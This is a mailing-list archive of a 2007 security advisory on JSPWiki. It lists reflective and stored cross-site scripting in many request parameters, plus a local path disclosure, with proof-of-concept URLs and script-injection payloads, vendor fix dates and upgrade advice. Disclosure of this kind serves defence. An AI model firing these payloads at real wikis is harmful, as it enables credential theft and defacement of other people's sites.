Full Disclosure mailing list archives
Re: JSPWiki Multiple Input Validation Vulnerabilities
From: <full-disclosure () hushmail com>
Date: Wed, 26 Sep 2007 07:30:59 -0400
Nice!!!! JSPWiki 0day! On Wed, 26 Sep 2007 00:35:53 -0400 Jason Kratzer <kratzer.jason () gmail com> wrote:
JSPWiki Multiple Input Validation Vulnerabilities Application: JSPWiki Version: 2.4.103 and 2.5.139 BID: 25803 Credit: Jason Kratzer Date: 9/24/2007 Background ------------------------------------------------------------ JSPWiki is wiki software built around the standard J2EE components of Java, servlets and JSP. It was written by Janne Jalkanen and released under the LGPL. The Sun Java System Portal Server includes it as one of its core applications. It is primarily used for company intranets and has an active developer community, also including the i3G Institute of the Heilbronn University. (Courtesy of Wikipedia: http://en.wikipedia.org/wiki/JSPWiki) Description ------------------------------------------------------------ Multiple Cross Site Scripting vulnerabilities have been discovered within the JSPWiki application, successfully allowing an attacker to steal credentials, falsify posts, and persistently deface portions of the site. Additionally, a Local Path Disclosure vulnerability was also discovered. Affected Versions ------------------------------------------------------------ Each vulnerability was confirmed in versions 2.4.103 and 2.5.139- beta. The Cross Site Scripting vulnerability affecting the redirect parameter is only found in version 2.5.139-beta. Proof of Concept Cross Site Scripting Vulnerabilities: ------------------------------------------------------------ http://vulnerable-site.com/wiki/NewGroup.jsp?group=Test Vulnerable Parameters: group=Test"<script>alert("Test+XSS")</script> members= Test"<script>alert("Test+XSS")</script> Type: Reflective ------------------------------------------------------------ http://vulnerable- site.com/wiki/Edit.jsp?page=Main&action=save&edittime=1186698299838 &addr=127.0.0.1&_editedtext=Test&changenote=Test&ok=Save Vulnerable Parameters: edittime=<script>alert("Test+XSS")</script> Type: Reflective ------------------------------------------------------------ http://vulnerable- site.com/wiki/Comment.jsp?page=Main&action=save&edittime=1186698386 737&addr=127.0.0.1&_editedtext=Test&author=AnonymousCoward&link=&ok =Save Vulnerable Parameters: edittime=<script>alert("Test+XSS")</script> author=<script>alert("Test+XSS")</script> link="><SCRIPT>alert("Test+XSS")</SCRIPT> Type: Reflective ------------------------------------------------------------ http://vulnerable- site.com/wiki/UserPreferences.jsp?tab=profile&loginname=Test&passwo rd=Test&password2=Test&wikiname=Test&fullname=Test&email=Test@Test. com&ok=Save+profile&action=saveProfile http://vulnerable- site.com/wiki/Login.jsp?tab=profile&loginname=Test&password=Test&pa ssword2=Test&wikiname=Test&fullname=Test&email=Test () Test com&ok=Sav e+profile&action=saveProfile Vulnerable Parameters: loginname="><script>alert("Test+XSS")</script> wikiname="><script>alert("Test+XSS")</script> fullname="><script>alert("Test+XSS")</script> email="><script>alert("Test+XSS")</script> Type: Reflective ------------------------------------------------------------ http://vulnerable-site.com/wiki/Diff.jsp?page=Administrator&r1=- 1&r2=1 Vulnerable Parameters: r1=<script>alert('Test XSS")</script> r2=<script>alert("Test+XSS")</script> Type: Reflective ------------------------------------------------------------ http://vulnerable- site.com/wiki/PageInfo.jsp?page=SystemInfo/test.jpg Vulnerable Parameters: changenote=<script>alert("Test+XSS")</script> Type: Stored ------------------------------------------------------------ http://vulnerable-site.com/wiki-3/Login.jsp?redirect=Main Vulnerable Parameter: redirect="><script>alert("Test+XSS")</script> Notes: The redirect parameter is found in multiple places through JSPWiki-2.5.139-beta and is vulnerable in every instance. ------------------------------------------------------------ Local Path Disclosure: http://vulnerable-site.com/wiki/attach/Main/Insert-Uploaded- Attachment-Filename-Here?version=1000000 (Nonexistent #) Vulnerable Parameter; Version=10000000 Notes: The non-existent number must be between 1 and 10 character otherwise a standard 500 error will be displayed. Vendor Notification ------------------------------------------------------------ The JSPWiki project was notified on September 10, 2007. Janne Jalkanen developed and implemented a fix by September 18, 2007. Remediation ------------------------------------------------------------ It is recommended to upgrade to JSPWiki version 2.4.104. It is also worth noting, the above vulnerabilities have also been fixed in the beta release, version 2.5.139. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
-- Click here for to find products that will help grow your small business. http://tagline.hushmail.com/fc/Ioyw6h4eDJa58QeqQZChgDR41kDBsOqlWnK9CObbwCzHOMDP3mf1yg/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: JSPWiki Multiple Input Validation Vulnerabilities full-disclosure (Sep 26)